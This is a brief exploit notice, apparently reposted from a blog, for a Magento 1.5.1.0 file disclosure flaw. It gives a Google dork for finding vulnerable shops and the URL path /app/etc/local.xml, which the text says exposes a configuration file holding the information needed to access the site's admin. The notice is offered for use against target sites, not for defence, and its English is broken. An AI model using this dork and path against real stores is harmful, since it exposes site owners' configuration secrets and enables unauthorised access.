Magento CMS File Disclosure Vulnerability by Kevin Mitnick

Magento CMS File Disclosure Vulnerability by Kevin Mitnick

12:48:00 AM | | No comment yet

##########################################
# Exploit Title      : Magento CMS File Disclosure Vulnerability
# Google Dork     : inurl:” /app/etc/local.xml”
# Date                : 7 Mey 2011
# Author             : Kevin Mitnick
# Software Link   : http://www.magentocommerce.com/download
# Version            : ver 1.5.1.0
# Tested on         : win7
###########################################

#Magento CMS File Disclosure Vulnerability

#Description :
#we need just to put this link to access to config file in this file we can find  all information to access to this cms : url admin

#url : www.target.com/app/etc/local.xml